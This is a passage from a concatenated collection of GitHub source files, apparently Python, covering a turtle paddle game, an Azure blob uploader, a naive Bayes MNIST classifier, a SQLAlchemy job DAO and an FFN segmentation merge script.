0.001\r\n scrn.update()\r\n if int(x) > 230 or int(x) < -230: \r\n vx = -vx \r\n scrn.update()\r\n if int(y) > 230 : \r\n vy = -vy \r\n scrn.update() \r\n for j in range(21): \r\n (x1,y1) = saghf1[j].position() \r\n if (x1 high_score:\r\n high_score = score\r\n score = 0\r\n update_score()\r\n reset_game()\r\n break \r\n\r\ndef reset_game():\r\n head.goto(0 , -220)\r\n scrn.update()\r\n t1.goto(0 , -203)\r\n scrn.update()\r\n #saghf()\r\n \r\n\r\n\r\ndef go_right():\r\n head.forward(50)\r\n scrn.update() \r\n\r\ndef go_left():\r\n head.forward(-50)\r\n scrn.update()\r\n\r\ndef set_random_color(n):\r\n r = random.randint(0,255)\r\n b = random.randint(0,255)\r\n g = random.randint(0,255)\r\n n.color(r,g,b)\r\n\r\ndef saghf():\r\n global saghf1 \r\n x = 210\r\n y = 250 \r\n saghf1 = [ ] \r\n for l in range(3):\r\n y = y - 30 \r\n x = 210 \r\n for i in range(7): \r\n t2 = turtle.Turtle() \r\n turtle.colormode(255) \r\n set_random_color(t2) \r\n scrn.update()\r\n t2.speed(0)\r\n t2.shape(\"square\") \r\n t2.penup()\r\n t2.shapesize(1.3,3.3) \r\n t2.setpos(x,y) \r\n t2.pendown() \r\n scrn.update()\r\n saghf1.append(t2)\r\n x = x - 70\r\n return t2 \r\n\r\n\r\ndef update_score():\r\n score_writer.undo()\r\n score_writer.hideturtle()\r\n score_writer.goto(130,-250 )\r\n s = \"Score: {} High Score: {}\".format(score, high_score)\r\n score_writer.write(s, align=\"center\", font=(\"Courier\", 12, \"normal\")) \r\n \r\ndef init_score_writer():\r\n pen = turtle.Turtle() \r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"blue\")\r\n pen.penup() \r\n scrn.update()\r\n pen.hideturtle()\r\n return pen\r\n\r\nscore = 0\r\nhigh_score = 0\r\ntime.sleep(0.1)\r\nwhile True:\r\n scrn = init_screen()\r\n #scrn.clear()\r\n head = init_padel()\r\n score_writer = init_score_writer()\r\n saghf()\r\n win= turtle.Screen()\r\n win.listen()\r\n win.onkey(go_right,\"Right\") \r\n win.onkey(go_left,\"Left\")\r\n ball()\r\n update_score()\r\n scrn.update()\r\n #time.sleep(0.1)\r\nturtle.mainloop()\r\n \r\n\r\n\r\n\r\n","repo_name":"helia-vafaei/padel_game","sub_path":"game-padel.py","file_name":"game-padel.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37666482229","text":"import pandas as pd\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\nprint('import done')\n\nEntrez.email = 'scdyao@gmail.com'\n\ndf = pd.read_excel(r'C:\\Users\\sc-dyao\\Desktop\\REHS-2019\\Py3.7\\entrez\\gene_result.xlsx')\n\nstring = ''\nfor gene in df['GeneID']:\n string += (str(gene) + ',')\n\n#string = '21,26090,79611,8754,54507'\n\n#print(string)\n#raise SystemExit\n\nentFile = Entrez.efetch(db='gene', id=string)\nprint('fetched data')\nentData = entFile.read()\nprint('read data')\n\noutput = open('gene_summaries.txt', 'w')\nnewGeneStart = 0\nnewGeneEnd = 0\nwhile newGeneEnd != -1:\n newGeneEnd = entData.find('Entrezgene', newGeneStart+1)\n startInd = entData.find('summary \"', newGeneStart, newGeneEnd)\n if startInd == -1:\n summary = \"\"\n else:\n endInd = entData.find('\"', startInd+9)\n summary = entData[startInd+9:endInd].replace('\\n', '')\n output.write(summary + '\\n')\n newGeneStart = newGeneEnd\noutput.close()\n","repo_name":"dyaom/REHS-2019","sub_path":"Py3.7/entrez/gene_description.py","file_name":"gene_description.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22508485407","text":"list = []\r\nops = []\r\nN = 12\r\n#N = int(input())\r\n# for i in range(N) :\r\n# string = input().split()\r\n# # array with all the operations\r\n# ops.append(string)\r\nops = ['insert 0 5','insert 1 10','insert 0 6','print','remove 6','append 9','append 1','sort','print','pop','reverse','print']\r\nfor j in ops :\r\n j = j.split() \r\n operation = j[0]\r\n \r\n if len(j) == 2 :\r\n e = int(j[1])\r\n elif len(j) == 3 :\r\n i = int(j[1])\r\n e = int(j[2])\r\n \r\n if operation == 'insert' :\r\n list.insert(i,e)\r\n elif operation == 'print' :\r\n print(list)\r\n elif operation == 'remove' :\r\n list.remove(e)\r\n elif operation == 'append' :\r\n list.append(e)\r\n elif operation == 'sort' :\r\n list.sort()\r\n elif operation == 'pop' :\r\n list.pop()\r\n elif operation == 'reverse' :\r\n list.reverse()\r\n","repo_name":"chusk2/python-code","sub_path":"list_operations.py","file_name":"list_operations.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19781678217","text":"# Loops\nprint('\\nNormal for loop')\nfor i in range(5):\n print(i)\n\nprint('\\nWhile loop')\nj = 5\nwhile j > 0:\n print(j)\n j -= 1\n\n# Loops in lists\nprint('\\nFor in lists')\nroles = ['admin', 'user', 'guest']\nfor role in roles:\n print(role)\n\n# Loops in dictionaries\nprint('\\nFor in dictionaries')\nprofessor = {\n 'name': 'Cesar Jaramillo',\n 'age': 40,\n 'degree': 'PhD'\n}\nfor key, value in professor.items():\n print(f'{key}: {value}')","repo_name":"cdlavila/python","sub_path":"15_loops.py","file_name":"15_loops.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6080948693","text":"from azure.storage.blob import BlobClient, BlobServiceClient\nimport os\n\nclass DirectoryClient:\n def __init__(self, connection_string, container_name):\n service_client = BlobServiceClient.from_connection_string(connection_string)\n self.client = service_client.get_container_client(container_name)\n\n def upload(self, source, dest):\n '''\n Upload a file or directory to a path inside the container\n '''\n if (os.path.isdir(source)):\n self.upload_dir(source, dest)\n else:\n self.upload_file(source, dest)\n\n def upload_file(self, source, dest):\n '''\n Upload a single file to a path inside the container\n '''\n print(f'Uploading {source} to {dest}')\n with open(source, 'rb') as data:\n self.client.upload_blob(name=dest, data=data, overwrite=True)\n\n def upload_dir(self, source, dest):\n '''\n Upload a directory to a path inside the container\n '''\n prefix = '' if dest == '' else dest + '/'\n prefix += os.path.basename(source) + '/'\n for root, dirs, files in os.walk(source):\n for name in files:\n dir_part = os.path.relpath(root, source)\n dir_part = '' if dir_part == '.' else dir_part + '/'\n file_path = os.path.join(root, name)\n blob_path = prefix + dir_part + name\n self.upload_file(file_path, blob_path)\n\n def ls_files(self, path, recursive=False):\n '''\n List files under a path, optionally recursively\n '''\n if not path == '' and not path.endswith('/'):\n path += '/'\n\n blob_iter = self.client.list_blobs(name_starts_with=path)\n files = []\n for blob in blob_iter:\n relative_path = os.path.relpath(blob.name, path)\n if recursive or not '/' in relative_path:\n files.append(relative_path)\n return files\n","repo_name":"chaiwee/backupDBtoAzureStorage","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30214568909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 30 05:32:43 2020\n\n@author: Azeemushan\n\"\"\"\n\nimport cv2\nimport time \nimport numpy as np\n\nclassifier = cv2.CascadeClassifier(r'haarcascade_car.xml')\ncap = cv2.VideoCapture('cars.avi')\ncount=0\nwhile cap.isOpened():\n ret,frame = cap.read()\n if ret:\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n cars = classifier.detectMultiScale(gray,1.3,3)\n for (x,y,w,h) in cars:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)\n cv2.imshow(\"Cars\",frame)\n cv2.imwrite(\"./frames/frame%d.jpg\" % count, frame)\n count += 1\n if cv2.waitKey(1) == 13:\n break\n else:\n print(\"Video Ended\")\n break\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"azeemushanali/MiniProjects","sub_path":"Computer Vision/Car Detection/car_detection.py","file_name":"car_detection.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73124038003","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom unittest import TestCase\nfrom ..ctm.Session import BaseSession, MorningSession, AfternoonSession\nfrom ..ctm.Exception import OutOfSessionDurationError\nfrom ..ctm.Talk import Talk\nfrom ..ctm.setting import AFTERNOON_DURATION, EXTRA_DURATION\n\nimport datetime\n\n\nclass TestBaseSession(TestCase):\n def setUp(self):\n test_talk_list = []\n for i in range(1, 4):\n talk = Talk('test{0}'.format(i), '{0}min'.format(i*10), '0{0}:00PM')\n test_talk_list.append(talk)\n self.talk_list = test_talk_list\n self.base_session = BaseSession()\n\n def test_check_duration(self):\n res = self.base_session.check_duration(datetime.timedelta(minutes=1))\n self.assertEqual(res, False)\n res = self.base_session.check_duration(datetime.timedelta(minutes=0))\n self.assertEqual(res, True)\n\n def test_check_talk_list(self):\n res = self.base_session._check_talk_list(self.talk_list)\n self.assertEqual(res, False)\n res = self.base_session._check_talk_list([])\n self.assertEqual(res, True)\n\n def test_format_datetime(self):\n self.assertEqual('05:00PM', self.base_session.format_datetime(datetime.datetime(1900, 1, 1, 17, 0)))\n\n\nclass TestMorningSession(TestCase):\n def setUp(self):\n test_talk_list = []\n for i in range(1, 4):\n talk = Talk('test{0}'.format(i), '{0}min'.format(i*10), '0{0}:00PM')\n test_talk_list.append(talk)\n self.talk_list = test_talk_list\n self.session = MorningSession()\n self.session.talk_list = self.talk_list\n\n def test_sort_talk_list(self):\n self.session._sort_talk_list()\n self.assertEqual(self.session.talk_list[1].start_at, '09:10AM')\n\n def test_get_talk_list_duration(self):\n self.assertEqual(self.session.get_talk_list_duration(), 60)\n\n\nclass TestAfternoonSession(TestCase):\n def setUp(self):\n self.session = AfternoonSession()\n\n def test_check_duration(self):\n res = self.session.check_duration(datetime.timedelta(minutes=AFTERNOON_DURATION+EXTRA_DURATION))\n self.assertEqual(res, True)\n res = self.session.check_duration(datetime.timedelta(minutes=AFTERNOON_DURATION+EXTRA_DURATION+1))\n self.assertEqual(res, False)\n\n","repo_name":"bluedazzle/CTM","sub_path":"src/test/test_Session.py","file_name":"test_Session.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37058474905","text":"from sqlalchemy.orm import Session\nfrom module_admin.entity.do.job_do import SysJob\nfrom module_admin.entity.vo.job_vo import JobModel\nfrom utils.time_format_util import list_format_datetime, object_format_datetime\n\n\nclass JobDao:\n \"\"\"\n 定时任务管理模块数据库操作层\n \"\"\"\n\n @classmethod\n def get_job_detail_by_id(cls, db: Session, job_id: int):\n \"\"\"\n 根据定时任务id获取定时任务详细信息\n :param db: orm对象\n :param job_id: 定时任务id\n :return: 定时任务信息对象\n \"\"\"\n job_info = db.query(SysJob) \\\n .filter(SysJob.job_id == job_id) \\\n .first()\n\n return object_format_datetime(job_info)\n\n @classmethod\n def get_job_detail_by_info(cls, db: Session, job: JobModel):\n \"\"\"\n 根据定时任务参数获取定时任务信息\n :param db: orm对象\n :param job: 定时任务参数对象\n :return: 定时任务信息对象\n \"\"\"\n job_info = db.query(SysJob) \\\n .filter(SysJob.job_name == job.job_name if job.job_name else True,\n SysJob.job_group == job.job_group if job.job_group else True,\n SysJob.invoke_target == job.invoke_target if job.invoke_target else True,\n SysJob.cron_expression == job.cron_expression if job.cron_expression else True) \\\n .first()\n\n return job_info\n\n @classmethod\n def get_job_list(cls, db: Session, query_object: JobModel):\n \"\"\"\n 根据查询参数获取定时任务列表信息\n :param db: orm对象\n :param query_object: 查询参数对象\n :return: 定时任务列表信息对象\n \"\"\"\n job_list = db.query(SysJob) \\\n .filter(SysJob.job_name.like(f'%{query_object.job_name}%') if query_object.job_name else True,\n SysJob.job_group == query_object.job_group if query_object.job_group else True,\n SysJob.status == query_object.status if query_object.status else True\n ) \\\n .distinct().all()\n\n return list_format_datetime(job_list)\n\n @classmethod\n def get_job_list_for_scheduler(cls, db: Session):\n \"\"\"\n 获取定时任务列表信息\n :param db: orm对象\n :return: 定时任务列表信息对象\n \"\"\"\n job_list = db.query(SysJob) \\\n .filter(SysJob.status == 0) \\\n .distinct().all()\n\n return list_format_datetime(job_list)\n\n @classmethod\n def add_job_dao(cls, db: Session, job: JobModel):\n \"\"\"\n 新增定时任务数据库操作\n :param db: orm对象\n :param job: 定时任务对象\n :return:\n \"\"\"\n db_job = SysJob(**job.dict())\n db.add(db_job)\n db.flush()\n\n return db_job\n\n @classmethod\n def edit_job_dao(cls, db: Session, job: dict):\n \"\"\"\n 编辑定时任务数据库操作\n :param db: orm对象\n :param job: 需要更新的定时任务字典\n :return:\n \"\"\"\n db.query(SysJob) \\\n .filter(SysJob.job_id == job.get('job_id')) \\\n .update(job)\n\n @classmethod\n def delete_job_dao(cls, db: Session, job: JobModel):\n \"\"\"\n 删除定时任务数据库操作\n :param db: orm对象\n :param job: 定时任务对象\n :return:\n \"\"\"\n db.query(SysJob) \\\n .filter(SysJob.job_id == job.job_id) \\\n .delete()\n","repo_name":"insistence/Dash-FastAPI-Admin","sub_path":"dash-fastapi-backend/module_admin/dao/job_dao.py","file_name":"job_dao.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"75"} +{"seq_id":"21057935195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 19 19:52:59 2019\n\n@author: Yanis\n\"\"\"\n\n# Classification template\n\n# Importing the libraries\nimport numpy as np\nimport math\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\nfrom skimage import transform\nimport os\n\nnp.random.seed(123)\n\nfrom scipy.io import loadmat\nfrom scipy.stats import norm, bernoulli\nfrom six.moves import urllib\n\n\ndef NaiveBayes(X_train, y_train, X_test, plot = False):\n # prepare model\n class_division = {}\n y_train = list(y_train)\n\n for index, feature_vector in X_train.iterrows():\n feature_vector=list(feature_vector)\n if y_train[index] not in class_division:\n class_division[y_train[index]] = [] \n class_division[y_train[index]].append(feature_vector)\n \n mean_std_tuples = {}\n for label, instances in class_division.items():\n mean_std_tuples[label] = group_mean_std_tuples(instances)\n \n #plot mean images\n if plot:\n for key, values in mean_std_tuples.items():\n means = [mean for mean, std in values]\n means.append(0)\n plot_mean_image(means, key)\n \n predictions = bulk_predict(mean_std_tuples, X_test, class_division)\n\n return predictions\n\ndef estimate_prior_prob(training_class_set):\n prior_prob = {}\n for i in range(10):\n prior_prob[i] = len(training_class_set[i]) / len(train)\n \n return prior_prob\n\ndef view_image(image, label=\"\"):\n \"\"\"View a single image.\"\"\"\n print(\"Label: %s\" % label)\n width = int(math.sqrt(len(image)))\n two_d = (np.reshape(image, (width, width))).astype(np.uint8)\n plt.title(\"Label: %s\" % label)\n plt.imshow(two_d,cmap=plt.cm.gray, origin='upper', interpolation='nearest')\n return plt\n \ndef plot_mean_image(vector,label):\n view_image(vector,label).show()\n \ndef group_mean_std_tuples(dataset):\n mean_std_tuples = []\n for vector in zip(*dataset):\n average = mean(vector)\n std = standard_deviation(average, vector)\n mean_std_tuples.append((average,std))\n del mean_std_tuples[-1] #remove the last label column summaries\n return mean_std_tuples\n\ndef mean(numbers):\n return sum(numbers) / float(len(numbers))\n\n\ndef standard_deviation(average, numbers):\n variance = sum([pow(x - average, 2) for x in numbers]) / float(len(numbers) - 1)\n return math.sqrt(variance) +1\n\n# choose y with largest sum(log(p(Xi|y))) + log(p(y)) \n# Normal distribution for number\n# Y = { 1/[ σ * sqrt(2π) ] } * e-(x - μ)2/2σ2\n# Source: https://stattrek.com/probability-distributions/normal.aspx\ndef estimate_posterior(x, mean, std, prior):\n #print(\"X: {} , mean: {}, std: {}\".format(x,mean,std))\n #log_probability = np.log(norm.pdf(x,mean,std))+ np.log(prior)\n exponent = math.exp(-(math.pow(float(x) - mean, 2) / (2 * math.pow(std, 2)))) +1\n value =1 / (math.sqrt(2 * math.pi) * std) +1\n return math.log(value * exponent) + math.log(prior + 1)\n #return log_probability\n\n# for every feature value and the corresponding mean and std use the respective distribution to \n# caculate probabilities of X to belong to any of the chosen classes\ndef estimate_probabilities_per_class(distribution_parameters, test_vector, prior_probabilities):\n probabilities = {}\n for label, dist_values in distribution_parameters.items():\n probabilities[label] = 0 #default it to 1\n for i in range(len(dist_values)):\n mean, std = dist_values[i]\n X = test_vector[i]\n probabilities[label] = probabilities[label] + estimate_posterior(X, mean, std, prior_probabilities[label])\n return probabilities\n\n#shuffle the dataframe and take the ration*data len for training and the rest for testing\ndef split_dataframe(dataframe, train_ratio):\n dataframe = dataframe.iloc[np.random.permutation(len(dataframe))]\n\n trainset_len = int(len(dataframe)*train_ratio)\n trainset = dataframe.iloc[0:trainset_len , : ]\n testset = dataframe.iloc[trainset_len:len(dataframe) , : ]\n \n return trainset,testset\n \n\n# For given test vector and estimated parameters find the class with the highest probability and assign it to this vector\ndef predict(distribution_parameters, test_vector, prior_probabilities):\n probabilities = estimate_probabilities_per_class(distribution_parameters, test_vector, prior_probabilities)\n predicted_label = None\n max_probability = -1\n\n for label, probability in probabilities.items():\n if probability > max_probability:\n max_probability = probability\n predicted_label = label\n return predicted_label\n\n#Caclucates the prediction per every row in the test set based on trained data\ndef bulk_predict(distribution_parameters, test_set, class_division):\n prior_probabilities = estimate_prior_prob(class_division)\n #print(prior_probabilities)\n predictions = [predict(distribution_parameters, list(feature_test_vector), prior_probabilities) for index, feature_test_vector in test_set.iterrows()]\n return predictions\n\n# Estimate % of correct results\ndef estimate_accuracy(test_set, results):\n correct = 0\n count = 0\n for feature_test_vector in test_set:\n if feature_test_vector == results[count]:\n correct += 1\n count = count+ 1\n return (correct / float(len(test_set)))\n\ndef bernoulli_fitting(X,y):\n alpha = 1.0\n count_sample = X.shape[0]\n separated = [[x for x, t in zip(X, y) if t == c] for c in np.unique(y)]\n class_log_prior = [np.log(len(i) / count_sample) for i in separated]\n count = np.array([np.array(i).sum(axis=0) for i in separated]) + alpha\n smoothing = 2 * alpha\n n_doc = np.array([len(i) + smoothing for i in separated])\n feature_prob = count / n_doc[np.newaxis].T\n\n return class_log_prior,feature_prob\n\n#per each items in the test set estimate the posterior\ndef predict_log_proba(X, class_log_prior,feature_prob):\n class_probabilities = []\n for x in X:\n #bernoulli.pmf(x, np.log(feature_prob))\n posterior_prob = np.log(feature_prob) * x \n sum_posterior = posterior_prob.sum(axis=1)\n class_probabilities.append(sum_posterior + class_log_prior)\n \n return class_probabilities\n#estimate the class probabilities and get the class with the largest one \ndef bernoulli_predicting(X_test,class_log_prior,feature_prob ):\n class_probabilities = predict_log_proba(X_test,class_log_prior,feature_prob)\n return np.argmax(class_probabilities, axis=1)\n\nmnist_url = \"https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat\"\nmnist_path = \"./mnist-original.mat\"\n\nexists = os.path.isfile(mnist_path)\nif not exists:\n response = urllib.request.urlopen(mnist_url)\n with open(mnist_path, \"wb\") as f:\n content = response.read()\n f.write(content)\nmnist_raw = loadmat(mnist_path)\nmnist = {\n \"data\": mnist_raw[\"data\"].T,\n \"target\": mnist_raw[\"label\"][0],\n \"COL_NAMES\": [\"label\", \"data\"],\n \"DESCR\": \"mldata.org dataset: mnist-original\",\n}\n#number_of_items = 56000\n#features = pd.DataFrame(np.array(mnist[\"data\"][:number_of_items,:], 'int16'))\n#labels = pd.DataFrame(np.array(mnist[\"target\"][:number_of_items], 'int'))\n\nfeatures = pd.DataFrame(np.array(mnist[\"data\"], 'int16'))\nlabels = pd.DataFrame(np.array(mnist[\"target\"], 'int'))\n\ndata = pd.concat([labels, features], axis=1)\ntrain, test = train_test_split(data, test_size=0.2)\n\ntrain_x = np.array(train.iloc[:, 1:])\ntest_x = np.array(test.iloc[:, 1:])\ntrain_y = np.array(train.iloc[:, 0])\ntest_y = np.array(test.iloc[:, 0])\n\n\ntarget_train_y = train_y.astype(np.uint8)\ntarget_test_y = test_y.astype(np.uint8)\n\n\ndef bounding_rescale_strech_image(image):\n initial_size = (28, 28)\n target_size = (20, 20)\n img_matrix = np.array(image).reshape((-1, 1, 28, 28)).astype(np.uint8)\n img = Image.fromarray(img_matrix[0][0])\n threshold_img = img.point(lambda x: 0 if x < 128 else 255, '1')\n img_reshaped = np.reshape(np.array(threshold_img), initial_size)\n row= np.unique(np.nonzero(img_reshaped)[0])\n col = np.unique(np.nonzero(img_reshaped)[1])\n scale_image = img_reshaped[min(row):max(row), min(col):max(col)]\n image_data_new = transform.resize(scale_image, target_size)\n return (np.array(image_data_new).astype(np.uint8))\n\n\ntrain_modified = np.apply_along_axis(bounding_rescale_strech_image, axis=1, arr=train_x)\ntest_modified = np.apply_along_axis(bounding_rescale_strech_image, axis=1, arr=test_x)\n\ntrain_final = np.reshape(train_modified, (train_modified.shape[0], 400))\ntest_final = np.reshape(test_modified, (test_modified.shape[0], 400))\n\n\ndef do_naive_bayes_normal(training_x,training_y, test_x, test_y,case, plot= False):\n result = NaiveBayes(training_x,training_y, test_x, plot)\n\n acc = estimate_accuracy(test_y, result)\n print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n \ndef do_naive_bayes_bernoulli(training_x, training_y, test_x, test_y, case):\n log_prior, feature_probability = bernoulli_fitting(training_x, training_y)\n result = bernoulli_predicting(test_x, log_prior, feature_probability)\n acc = estimate_accuracy(test_y, result)\n print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n\n#training_set_final = pd.concat([pd.DataFrame(train_final), pd.DataFrame(target_train_y)], axis=1)\n\ndo_naive_bayes_normal(pd.DataFrame(train_x), train_y, pd.DataFrame(test_x),test_y, \"untouched_gausian\", True)\ndo_naive_bayes_normal(pd.DataFrame(train_final), target_train_y, pd.DataFrame(test_final), target_test_y, \"bounded_stretched_gausian\")\ndo_naive_bayes_bernoulli(train_x, train_y, test_x, test_y, \"untouched_bernoulli\")\ndo_naive_bayes_bernoulli(train_final, target_train_y, test_final, target_test_y, \"bounded_stretched_bernoulli\")\n\ndef do_random_forest(d, n, train_x1, train_y1, test_x1, test_y1, case):\n random_forest_model = RandomForestClassifier(max_depth=d, random_state=0, n_estimators=n)\n random_forest_model.fit(train_x1, train_y1)\n preiction = random_forest_model.predict(test_x1)\n acc = estimate_accuracy(test_y1, preiction)\n print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n\n\n#do_random_forest(4, 10, train_x, train_y, test_x, test_y, \"4/10 untouched\")\n#do_random_forest(4, 30, train_x, train_y, test_x, test_y, \"4/30 untouched\")\n#do_random_forest(4, 10, train_final, target_train_y, test_final, target_test_y, \"4/10 bounded and stretched\")\n#do_random_forest(4, 30, train_final, target_train_y, test_final, target_test_y, \"4/30 bounded and stretched\")\n\n#do_random_forest(16, 10, train_x, train_y, test_x, test_y, \"16/10 untouched\")\n#do_random_forest(16, 30, train_x, train_y, test_x, test_y, \"16/30 untouched\")\n\n#do_random_forest(16, 10, train_final, target_train_y, test_final, target_test_y, \"16/10 bounded and stretched\")\n#do_random_forest(16, 30, train_final, target_train_y, test_final, target_test_y, \"16/30 bounded and stretched\")","repo_name":"yan6pz/AML-Projects","sub_path":"homework1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":11119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30879749418","text":"'''Fourth Stage in reconciliate of ffn inference sub volumes.\n\nWorkflow:\n1. Assume object ids in subvols are globally unique as output from first stage.\n3. Find overlap dict between pairs of precomputed volumes and generate object id pairs\n4. Form global reconciliation graph and remap labels \n5. Write into one final precomputed cube\n\n\n1. For each seg-*.npz, load subvol, make label contiguous\n2. Find max id for each subvol and set offset for each subvol\n3. Update each subvol with offset\n4. Write to cloudvolume\n\n'''\nimport cloudvolume\nimport re\nimport time\nimport numpy as np\nfrom pprint import pprint\nimport argparse\nimport fastremap\nfrom cloudvolume.lib import Bbox\nfrom ffn.inference.segmentation import make_labels_contiguous\nfrom ffn.inference.segmentation import clear_dust, make_labels_contiguous, clean_up\n# Agglomerate from seg folders and output to cloud volume \n# from klab_utils.ffn.export_inference import load_inference, get_zyx\nimport logging\nimport glob\nimport os\nimport re\nfrom ffn.utils.bounding_box import BoundingBox\nfrom cloudvolume.lib import Bbox\nfrom cloudvolume import CloudVolume\nfrom tqdm import tqdm\nfrom ffn.utils import bounding_box\nfrom ffn.utils.bounding_box import intersection\nimport itertools\nimport networkx as nx\nimport json\nimport pickle\nimport sys\nimport time\nimport h5py\n\nfrom mpi4py import MPI\nmpi_comm = MPI.COMM_WORLD\nmpi_rank = mpi_comm.Get_rank()\nmpi_size = mpi_comm.Get_size()\n\n\ndef get_bbox_from_cv(cvol):\n offset = np.array(cvol.info['scales'][0]['voxel_offset'])\n size = np.array(cvol.info['scales'][0]['size'])\n return Bbox(offset, offset + size)\ndef get_merge_dict(G):\n source_cube = nx.get_node_attributes(G, 'cube')\n conn = nx.connected_components(G)\n\n unique_cubes = np.unique(list(source_cube.values()))\n global_merge_dict = {uid:{} for uid in unique_cubes}\n pbar = tqdm(conn, desc='Find remap for each component')\n for c in pbar:\n c = list(c)\n c.sort()\n for _c in c:\n src_cube = source_cube[_c]\n global_merge_dict[src_cube][_c] = c[0] \n return global_merge_dict \n\n\n\n\ndef prepare_precomputed(\n precomputed_path, \n offset, \n size, \n resolution, \n chunk_size, \n factor=(2,2,1), \n dtype='uint32',\n parallel=False\n ):\n cv_args = dict(\n bounded=True, fill_missing=False, autocrop=False,\n cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=True, parallel=parallel)\n info = CloudVolume.create_new_info(\n num_channels=1,\n layer_type='segmentation',\n data_type=dtype,\n encoding='compressed_segmentation',\n # encoding='raw',\n resolution=list(resolution),\n voxel_offset=np.array(offset),\n volume_size=np.array(size),\n chunk_size=chunk_size,\n max_mip=0,\n factor=factor,\n )\n cv = CloudVolume('file://'+precomputed_path, mip=0, info=info, **cv_args)\n cv.commit_info()\n return cv\ndef merge_g_op(a, b, datatype):\n return nx.compose(a, b)\n\n# def get_union_bbox_and_merge_path(seg_map, merge_output):\n# bbox_list = [v['bbox'] for v in seg_map.values()]\n# minpt = np.min(np.stack([np.array(b.minpt) for b in bbox_list], 0), axis=0)\n# maxpt = np.max(np.stack([np.array(b.maxpt) for b in bbox_list], 0), axis=0)\n \n# union_offset = minpt\n# union_size = maxpt - minpt\n# union_bbox = Bbox(minpt, maxpt)\n# cv_merge_path = '%s/precomputed-%d_%d_%d_%d_%d_%d/' % (merge_output, \n# union_offset[0], union_offset[1], union_offset[2],\n# union_size[0], union_size[1], union_size[2])\n# return union_bbox, cv_merge_path\ndef prewrite(union_bbox, cv_merge_path, resolution, chunk_size):\n union_offset = np.array(union_bbox.minpt)\n union_size = np.array(union_bbox.maxpt) - np.array(union_bbox.minpt)\n padded_union_size = ((union_size-1) // chunk_size + 1 ) * chunk_size\n\n cv_merge = prepare_precomputed(\n cv_merge_path, \n offset=union_offset, \n size=padded_union_size, \n resolution=resolution, \n chunk_size=chunk_size)\n # Pre paint the cv with 0\n # cv_merge[union_bbox] = np.zeros((union_size), dtype=np.uint32)\n \n cv_args = dict(\n bounded=False, fill_missing=True, autocrop=False,\n cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=True, parallel=False)\n\n for z_start in range(union_offset[2], union_offset[2] + union_size[2], chunk_size[2]):\n logging.warning('z: %d', z_start)\n # cv_merge[:,:,z_start:z_start+chunk_size[2]] = np.zeros((union_size[0], union_size[1], chunk_size[2]), dtype=np.uint32)\n cv_merge[:,:,z_start:z_start+chunk_size[2]] = np.zeros((padded_union_size[0], padded_union_size[1], chunk_size[2]), dtype=np.uint32)\n logging.info('prewrite_finished')\n\ndef get_union_bbox_and_merge_path(seg_map, merge_output, global_offset):\n seg_map = {k: v for k, v in seg_map.items() if v}\n bbox_list = [v['bbox'] for v in seg_map.values()]\n minpt = np.min(np.stack([np.array(b.minpt) for b in bbox_list], 0), axis=0)\n maxpt = np.max(np.stack([np.array(b.maxpt) for b in bbox_list], 0), axis=0)\n \n union_offset = minpt + global_offset\n union_size = maxpt - minpt\n # union_bbox = Bbox(minpt, maxpt)\n union_bbox = Bbox(union_offset, union_offset + union_size)\n cv_merge_path = '%s/precomputed-%d_%d_%d_%d_%d_%d/' % (merge_output, \n union_offset[0], union_offset[1], union_offset[2],\n union_size[0], union_size[1], union_size[2])\n return union_bbox, cv_merge_path\ndef get_chunk_bboxes(union_bbox, chunk_size):\n ffn_style_bbox = bounding_box.BoundingBox(\n np.array(union_bbox.minpt), np.array(union_bbox.size3()))\n\n calc = bounding_box.OrderlyOverlappingCalculator(\n outer_box=ffn_style_bbox, \n sub_box_size=chunk_size, \n overlap=[0,0,0], \n include_small_sub_boxes=True,\n back_shift_small_sub_boxes=False)\n bbs = [ffn_bb for ffn_bb in calc.generate_sub_boxes()]\n for ffn_bb in bbs:\n logging.warning('sub_bb: %s', ffn_bb)\n return bbs\n\ndef h5_to_cloudvolume(h5_path, cv_path, union_offset, local_sub_bboxes, resolution, \n chunk_size, global_offset=(0, 0, 0), flip_h5=False):\n\n cv_args = dict(\n bounded=False, fill_missing=True, autocrop=False,\n 